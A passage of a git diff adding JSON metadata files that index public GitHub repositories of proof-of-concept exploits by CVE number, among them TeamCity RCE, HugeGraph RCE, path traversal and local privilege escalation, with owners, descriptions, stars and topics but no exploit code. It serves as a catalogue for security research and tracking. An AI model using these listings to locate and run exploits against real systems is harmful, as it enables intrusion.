"yoryio\/CVE-2024-27198", + "owner": { + "login": "yoryio", + "id": 134471901, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134471901?v=4", + "html_url": "https:\/\/github.com\/yoryio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yoryio\/CVE-2024-27198", + "description": "Exploit for CVE-2024-27198 - TeamCity Server", + "fork": false, + "created_at": "2024-03-05T05:43:06Z", + "updated_at": "2024-11-21T05:27:06Z", + "pushed_at": "2024-03-08T06:13:09Z", + "stargazers_count": 30, + "watchers_count": 30, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-27198", + "teamcity-server" + ], + "visibility": "public", + "forks": 4, + "watchers": 30, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 767867288, + "name": "CVE-2024-27198-RCE", + "full_name": "W01fh4cker\/CVE-2024-27198-RCE", + "owner": { + "login": "W01fh4cker", + "id": 101872898, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101872898?v=4", + "html_url": "https:\/\/github.com\/W01fh4cker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/W01fh4cker\/CVE-2024-27198-RCE", + "description": "CVE-2024-27198 & CVE-2024-27199 Authentication Bypass --> RCE in JetBrains TeamCity Pre-2023.11.4", + "fork": false, + "created_at": "2024-03-06T03:15:03Z", + "updated_at": "2024-11-26T22:50:05Z", + "pushed_at": "2024-03-11T07:57:40Z", + "stargazers_count": 144, + "watchers_count": 144, + "has_discussions": false, + "forks_count": 36, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0day", + "auth", + "cve-2024-27198", + "cve-2024-27199", + "exploit", + "jetbrains", + "rce", + "redteam", + "teamcity" + ], + "visibility": "public", + "forks": 36, + "watchers": 144, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 768698596, + "name": "CVE-2024-27198", + "full_name": "rampantspark\/CVE-2024-27198", + "owner": { + "login": "rampantspark", + "id": 80992075, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80992075?v=4", + "html_url": "https:\/\/github.com\/rampantspark", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rampantspark\/CVE-2024-27198", + "description": "A PoC for CVE-2024-27198 written in golang", + "fork": false, + "created_at": "2024-03-07T15:12:56Z", + "updated_at": "2024-03-07T16:44:20Z", + "pushed_at": "2024-03-10T16:57:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-27198", + "teamcity-2023-11-4" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 769143780, + "name": "CVE-2024-27198-RCE", + "full_name": "passwa11\/CVE-2024-27198-RCE", + "owner": { + "login": "passwa11", + "id": 112363374, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112363374?v=4", + "html_url": "https:\/\/github.com\/passwa11", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/passwa11\/CVE-2024-27198-RCE", + "description": null, + "fork": false, + "created_at": "2024-03-08T12:40:09Z", + "updated_at": "2024-10-01T21:19:37Z", + "pushed_at": "2024-03-08T12:40:19Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 769432413, + "name": "CVE-2024-27198-RCE", + "full_name": "CharonDefalt\/CVE-2024-27198-RCE", + "owner": { + "login": "CharonDefalt", + "id": 103410775, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103410775?v=4", + "html_url": "https:\/\/github.com\/CharonDefalt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CharonDefalt\/CVE-2024-27198-RCE", + "description": null, + "fork": false, + "created_at": "2024-03-09T04:04:23Z", + "updated_at": "2024-03-14T02:01:22Z", + "pushed_at": "2024-03-09T04:09:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 769726782, + "name": "CVE-2024-27198-EXPLOIT", + "full_name": "K3ysTr0K3R\/CVE-2024-27198-EXPLOIT", + "owner": { + "login": "K3ysTr0K3R", + "id": 70909693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4", + "html_url": "https:\/\/github.com\/K3ysTr0K3R", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2024-27198-EXPLOIT", + "description": "A PoC exploit for CVE-2024-27198 - JetBrains TeamCity Authentication Bypass", + "fork": false, + "created_at": "2024-03-09T22:04:07Z", + "updated_at": "2024-08-03T02:02:30Z", + "pushed_at": "2024-03-09T22:16:46Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "authentication-bypass", + "cve-2024-27198", + "exploit", + "exploitation", + "hacked", + "jetbrains", + "poc", + "scanner", + "teamcity" + ], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 780859868, + "name": "Explora-o-RCE-n-o-autenticado-JetBrains-TeamCity-CVE-2024-27198-", + "full_name": "Shimon03\/Explora-o-RCE-n-o-autenticado-JetBrains-TeamCity-CVE-2024-27198-", + "owner": { + "login": "Shimon03", + "id": 78235187, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78235187?v=4", + "html_url": "https:\/\/github.com\/Shimon03", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Shimon03\/Explora-o-RCE-n-o-autenticado-JetBrains-TeamCity-CVE-2024-27198-", + "description": "Em fevereiro de 2024, foi identificado duas novas vulnerabilidades que afetam o servidor JetBrains TeamCity (CVE-2024-27198 e CVE-2024-27199)", + "fork": false, + "created_at": "2024-04-02T09:46:51Z", + "updated_at": "2024-04-02T09:46:51Z", + "pushed_at": "2024-04-02T09:46:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 790442683, + "name": "RCity-CVE-2024-27198", + "full_name": "Stuub\/RCity-CVE-2024-27198", + "owner": { + "login": "Stuub", + "id": 60468836, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60468836?v=4", + "html_url": "https:\/\/github.com\/Stuub", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Stuub\/RCity-CVE-2024-27198", + "description": "CVE-2024-27198 & CVE-2024-27199 PoC - RCE, Admin Account Creation, Enum Users, Server Information", + "fork": false, + "created_at": "2024-04-22T22:14:24Z", + "updated_at": "2024-11-24T06:18:34Z", + "pushed_at": "2024-07-19T14:42:24Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "code-injection", + "cve", + "cve-2024-27198", + "cve-2024-27199", + "jetbrains", + "owasp", + "python", + "python3", + "rce", + "teamcity" + ], + "visibility": "public", + "forks": 3, + "watchers": 26, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 831484050, + "name": "CVE-2024-27198", + "full_name": "HPT-Intern-Task-Submission\/CVE-2024-27198", + "owner": { + "login": "HPT-Intern-Task-Submission", + "id": 169382051, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/169382051?v=4", + "html_url": "https:\/\/github.com\/HPT-Intern-Task-Submission", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HPT-Intern-Task-Submission\/CVE-2024-27198", + "description": null, + "fork": false, + "created_at": "2024-07-20T17:26:13Z", + "updated_at": "2024-07-20T17:28:45Z", + "pushed_at": "2024-07-20T17:28:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 843255325, + "name": "CVE-2024-27198", + "full_name": "jrbH4CK\/CVE-2024-27198", + "owner": { + "login": "jrbH4CK", + "id": 163496398, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/163496398?v=4", + "html_url": "https:\/\/github.com\/jrbH4CK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jrbH4CK\/CVE-2024-27198", + "description": "PoC about CVE-2024-27198", + "fork": false, + "created_at": "2024-08-16T05:39:57Z", + "updated_at": "2024-08-16T16:43:59Z", + "pushed_at": "2024-08-16T16:43:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 870123268, + "name": "CVE-2024-27198", + "full_name": "geniuszlyy\/CVE-2024-27198", + "owner": { + "login": "geniuszlyy", + "id": 137893386, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/137893386?v=4", + "html_url": "https:\/\/github.com\/geniuszlyy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geniuszlyy\/CVE-2024-27198", + "description": "is a PoC tool that targets a vulnerability in the TeamCity server (CVE-2024-27198)", + "fork": false, + "created_at": "2024-10-09T13:36:56Z", + "updated_at": "2024-10-21T08:14:55Z", + "pushed_at": "2024-10-09T13:37:56Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 872559049, + "name": "CVE-2024-27198_POC", + "full_name": "Cythonic1\/CVE-2024-27198_POC", + "owner": { + "login": "Cythonic1", + "id": 163199970, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/163199970?v=4", + "html_url": "https:\/\/github.com\/Cythonic1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cythonic1\/CVE-2024-27198_POC", + "description": "a proof of concept of the CVE-2024-27198 which infect jetbrains teamCity", + "fork": false, + "created_at": "2024-10-14T16:40:58Z", + "updated_at": "2024-10-21T13:17:52Z", + "pushed_at": "2024-10-21T10:05:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27292.json b/2024/CVE-2024-27292.json new file mode 100644 index 0000000000..30fd916a89 --- /dev/null +++ b/2024/CVE-2024-27292.json @@ -0,0 +1,33 @@ +[ + { + "id": 822912763, + "name": "CVE-2024-27292", + "full_name": "th3gokul\/CVE-2024-27292", + "owner": { + "login": "th3gokul", + "id": 89386101, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89386101?v=4", + "html_url": "https:\/\/github.com\/th3gokul", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/th3gokul\/CVE-2024-27292", + "description": "CVE-2024-27292 : Docassemble V1.4.96 Unauthenticated Path Traversal", + "fork": false, + "created_at": "2024-07-02T04:41:35Z", + "updated_at": "2024-08-01T14:45:11Z", + "pushed_at": "2024-07-02T11:39:54Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27316.json b/2024/CVE-2024-27316.json new file mode 100644 index 0000000000..b18f70c7b9 --- /dev/null +++ b/2024/CVE-2024-27316.json @@ -0,0 +1,71 @@ +[ + { + "id": 784116051, + "name": "CVE-2024-27316", + "full_name": "lockness-Ko\/CVE-2024-27316", + "owner": { + "login": "lockness-Ko", + "id": 42625905, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42625905?v=4", + "html_url": "https:\/\/github.com\/lockness-Ko", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lockness-Ko\/CVE-2024-27316", + "description": "Proof of concept (PoC) for CVE-2024-27316 (tested), CVE-2024-30255 (untested), CVE-2024-31309 (untested), CVE-2024-28182 (untested), CVE-2024-2653 (untested) and CVE-2024-27919 (untested)", + "fork": false, + "created_at": "2024-04-09T08:08:07Z", + "updated_at": "2024-11-16T19:52:20Z", + "pushed_at": "2024-04-13T09:02:39Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-2653", + "cve-2024-27316", + "cve-2024-27919", + "cve-2024-28182", + "cve-2024-30255", + "cve-2024-31309" + ], + "visibility": "public", + "forks": 3, + "watchers": 14, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 788117590, + "name": "CVE-2024-27316_poc", + "full_name": "aeyesec\/CVE-2024-27316_poc", + "owner": { + "login": "aeyesec", + "id": 61375985, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61375985?v=4", + "html_url": "https:\/\/github.com\/aeyesec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aeyesec\/CVE-2024-27316_poc", + "description": null, + "fork": false, + "created_at": "2024-04-17T20:08:05Z", + "updated_at": "2024-07-13T18:36:41Z", + "pushed_at": "2024-04-17T21:31:35Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27348.json b/2024/CVE-2024-27348.json new file mode 100644 index 0000000000..4a7dfe886a --- /dev/null +++ b/2024/CVE-2024-27348.json @@ -0,0 +1,123 @@ +[ + { + "id": 808784376, + "name": "CVE-2024-27348", + "full_name": "Zeyad-Azima\/CVE-2024-27348", + "owner": { + "login": "Zeyad-Azima", + "id": 62406753, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62406753?v=4", + "html_url": "https:\/\/github.com\/Zeyad-Azima", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Zeyad-Azima\/CVE-2024-27348", + "description": "Apache HugeGraph Server RCE Scanner ( CVE-2024-27348 )", + "fork": false, + "created_at": "2024-05-31T20:11:37Z", + "updated_at": "2024-11-20T16:30:48Z", + "pushed_at": "2024-06-08T09:12:43Z", + "stargazers_count": 61, + "watchers_count": 61, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache", + "cve", + "cve-scanning", + "exploit", + "vulnerability", + "vulnerability-scanners" + ], + "visibility": "public", + "forks": 15, + "watchers": 61, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 809953064, + "name": "CVE-2024-27348", + "full_name": "kljunowsky\/CVE-2024-27348", + "owner": { + "login": "kljunowsky", + "id": 104329412, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104329412?v=4", + "html_url": "https:\/\/github.com\/kljunowsky", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kljunowsky\/CVE-2024-27348", + "description": "Apache HugeGraph Server Unauthenticated RCE - CVE-2024-27348 Proof of concept Exploit ", + "fork": false, + "created_at": "2024-06-03T19:08:24Z", + "updated_at": "2024-10-03T04:22:14Z", + "pushed_at": "2024-06-03T19:20:10Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache", + "application-security", + "bugbounty", + "bugbounty-tool", + "bugbountytips", + "cve-2024-27348", + "exploit", + "hack", + "hacking-tool", + "hugehraph", + "malware", + "one-day-exploit", + "penetration-testing-tools", + "platform-security", + "rce", + "security", + "unauthenticated", + "web-application-security", + "zero-day", + "zero-day-exploit" + ], + "visibility": "public", + "forks": 8, + "watchers": 16, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 814037616, + "name": "CVE-2024-27348-Apache-HugeGraph-RCE", + "full_name": "jakabakos\/CVE-2024-27348-Apache-HugeGraph-RCE", + "owner": { + "login": "jakabakos", + "id": 42498816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4", + "html_url": "https:\/\/github.com\/jakabakos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jakabakos\/CVE-2024-27348-Apache-HugeGraph-RCE", + "description": null, + "fork": false, + "created_at": "2024-06-12T08:14:39Z", + "updated_at": "2024-10-21T13:17:59Z", + "pushed_at": "2024-06-12T08:19:55Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27460.json b/2024/CVE-2024-27460.json new file mode 100644 index 0000000000..660e937ca9 --- /dev/null +++ b/2024/CVE-2024-27460.json @@ -0,0 +1,95 @@ +[ + { + "id": 799487639, + "name": "CVE-2024-27460", + "full_name": "xct\/CVE-2024-27460", + "owner": { + "login": "xct", + "id": 9291767, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9291767?v=4", + "html_url": "https:\/\/github.com\/xct", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xct\/CVE-2024-27460", + "description": "Plantronics Desktop Hub LPE", + "fork": false, + "created_at": "2024-05-12T09:53:07Z", + "updated_at": "2024-11-21T05:23:58Z", + "pushed_at": "2024-05-15T15:12:59Z", + "stargazers_count": 36, + "watchers_count": 36, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 36, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 799923080, + "name": "CVE-2024-27460", + "full_name": "Alaatk\/CVE-2024-27460", + "owner": { + "login": "Alaatk", + "id": 21007805, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21007805?v=4", + "html_url": "https:\/\/github.com\/Alaatk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Alaatk\/CVE-2024-27460", + "description": "HP Plantronics Hub 3.2.1 Updater Privilege Escalation", + "fork": false, + "created_at": "2024-05-13T11:15:14Z", + "updated_at": "2024-05-18T05:33:59Z", + "pushed_at": "2024-05-14T13:55:29Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802330596, + "name": "CVE-2024-27460-installer", + "full_name": "10cks\/CVE-2024-27460-installer", + "owner": { + "login": "10cks", + "id": 47177550, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47177550?v=4", + "html_url": "https:\/\/github.com\/10cks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/10cks\/CVE-2024-27460-installer", + "description": null, + "fork": false, + "created_at": "2024-05-18T02:25:11Z", + "updated_at": "2024-05-18T02:26:11Z", + "pushed_at": "2024-05-18T02:26:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27462.json b/2024/CVE-2024-27462.json new file mode 100644 index 0000000000..b9dea082dc --- /dev/null +++ b/2024/CVE-2024-27462.json @@ -0,0 +1,33 @@ +[ + { + "id": 786007891, + "name": "CVE-2024-27462", + "full_name": "Alaatk\/CVE-2024-27462", + "owner": { + "login": "Alaatk", + "id": 21007805, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21007805?v=4", + "html_url": "https:\/\/github.com\/Alaatk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Alaatk\/CVE-2024-27462", + "description": "Wondershare MobileTrans 4.5.6 - Unquoted Service Path", + "fork": false, + "created_at": "2024-04-13T06:27:28Z", + "updated_at": "2024-04-17T11:52:07Z", + "pushed_at": "2024-04-13T06:34:00Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27474.json b/2024/CVE-2024-27474.json new file mode 100644 index 0000000000..ef97b165c4 --- /dev/null +++ b/2024/CVE-2024-27474.json @@ -0,0 +1,33 @@ +[ + { + "id": 782029434, + "name": "Leantime-POC", + "full_name": "dead1nfluence\/Leantime-POC", + "owner": { + "login": "dead1nfluence", + "id": 152615382, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152615382?v=4", + "html_url": "https:\/\/github.com\/dead1nfluence", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dead1nfluence\/Leantime-POC", + "description": "CVE-2024-27474, CVE-2024-27476, CVE-2024-27477", + "fork": false, + "created_at": "2024-04-04T13:58:33Z", + "updated_at": "2024-04-04T13:58:33Z", + "pushed_at": "2024-04-10T13:41:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27518.json b/2024/CVE-2024-27518.json new file mode 100644 index 0000000000..08e2b98b6d --- /dev/null +++ b/2024/CVE-2024-27518.json @@ -0,0 +1,33 @@ +[ + { + "id": 781492709, + "name": "CVE-2024-27518", + "full_name": "secunnix\/CVE-2024-27518", + "owner": { + "login": "secunnix", + "id": 104568161, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104568161?v=4", + "html_url": "https:\/\/github.com\/secunnix", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/secunnix\/CVE-2024-27518", + "description": "SUPERAntiSpyware Professional X <=10.0.1264 LPE Vulnerability PoC", + "fork": false, + "created_at": "2024-04-03T13:41:18Z", + "updated_at": "2024-04-03T13:42:31Z", + "pushed_at": "2024-04-04T18:01:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27564.json b/2024/CVE-2024-27564.json new file mode 100644 index 0000000000..06bc5bc1fd --- /dev/null +++ b/2024/CVE-2024-27564.json @@ -0,0 +1,64 @@ +[ + { + "id": 857682897, + "name": "SSRF-Exploit-CVE-2024-27564", + "full_name": "MuhammadWaseem29\/SSRF-Exploit-CVE-2024-27564", + "owner": { + "login": "MuhammadWaseem29", + "id": 161931698, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161931698?v=4", + "html_url": "https:\/\/github.com\/MuhammadWaseem29", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MuhammadWaseem29\/SSRF-Exploit-CVE-2024-27564", + "description": null, + "fork": false, + "created_at": "2024-09-15T10:25:01Z", + "updated_at": "2024-09-19T00:54:29Z", + "pushed_at": "2024-09-15T11:55:25Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 857770278, + "name": "CVE-2024-27564", + "full_name": "Quantum-Hacker\/CVE-2024-27564", + "owner": { + "login": "Quantum-Hacker", + "id": 140636140, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/140636140?v=4", + "html_url": "https:\/\/github.com\/Quantum-Hacker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Quantum-Hacker\/CVE-2024-27564", + "description": null, + "fork": false, + "created_at": "2024-09-15T15:11:54Z", + "updated_at": "2024-09-23T18:47:05Z", + "pushed_at": "2024-09-15T15:54:21Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27619.json b/2024/CVE-2024-27619.json new file mode 100644 index 0000000000..32889e4768 --- /dev/null +++ b/2024/CVE-2024-27619.json @@ -0,0 +1,33 @@ +[ + { + "id": 762818458, + "name": "dir-3040_dos", + "full_name": "ioprojecton\/dir-3040_dos", + "owner": { + "login": "ioprojecton", + "id": 46145992, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46145992?v=4", + "html_url": "https:\/\/github.com\/ioprojecton", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ioprojecton\/dir-3040_dos", + "description": "CVE-2024-27619", + "fork": false, + "created_at": "2024-02-24T19:21:00Z", + "updated_at": "2024-03-05T14:45:29Z", + "pushed_at": "2024-03-29T17:01:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27630.json b/2024/CVE-2024-27630.json new file mode 100644 index 0000000000..b2b30ffeaa --- /dev/null +++ b/2024/CVE-2024-27630.json @@ -0,0 +1,33 @@ +[ + { + "id": 783101689, + "name": "CVE-2024-27630", + "full_name": "ally-petitt\/CVE-2024-27630", + "owner": { + "login": "ally-petitt", + "id": 76501220, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76501220?v=4", + "html_url": "https:\/\/github.com\/ally-petitt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ally-petitt\/CVE-2024-27630", + "description": "CVE-2024–27630 Reference", + "fork": false, + "created_at": "2024-04-07T00:13:13Z", + "updated_at": "2024-04-07T23:41:31Z", + "pushed_at": "2024-04-07T01:16:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27631.json b/2024/CVE-2024-27631.json new file mode 100644 index 0000000000..59a925e01c --- /dev/null +++ b/2024/CVE-2024-27631.json @@ -0,0 +1,33 @@ +[ + { + "id": 783094631, + "name": "CVE-2024-27631", + "full_name": "ally-petitt\/CVE-2024-27631", + "owner": { + "login": "ally-petitt", + "id": 76501220, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76501220?v=4", + "html_url": "https:\/\/github.com\/ally-petitt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ally-petitt\/CVE-2024-27631", + "description": "CVE-2024–27631 Reference", + "fork": false, + "created_at": "2024-04-06T23:30:01Z", + "updated_at": "2024-04-06T23:30:02Z", + "pushed_at": "2024-04-07T00:23:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27632.json b/2024/CVE-2024-27632.json new file mode 100644 index 0000000000..20b6340e7b --- /dev/null +++ b/2024/CVE-2024-27632.json @@ -0,0 +1,33 @@ +[ + { + "id": 783096643, + "name": "CVE-2024-27632", + "full_name": "ally-petitt\/CVE-2024-27632", + "owner": { + "login": "ally-petitt", + "id": 76501220, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76501220?v=4", + "html_url": "https:\/\/github.com\/ally-petitt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ally-petitt\/CVE-2024-27632", + "description": "CVE-2024–27632 Reference", + "fork": false, + "created_at": "2024-04-06T23:42:30Z", + "updated_at": "2024-04-08T03:11:14Z", + "pushed_at": "2024-04-07T00:12:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + 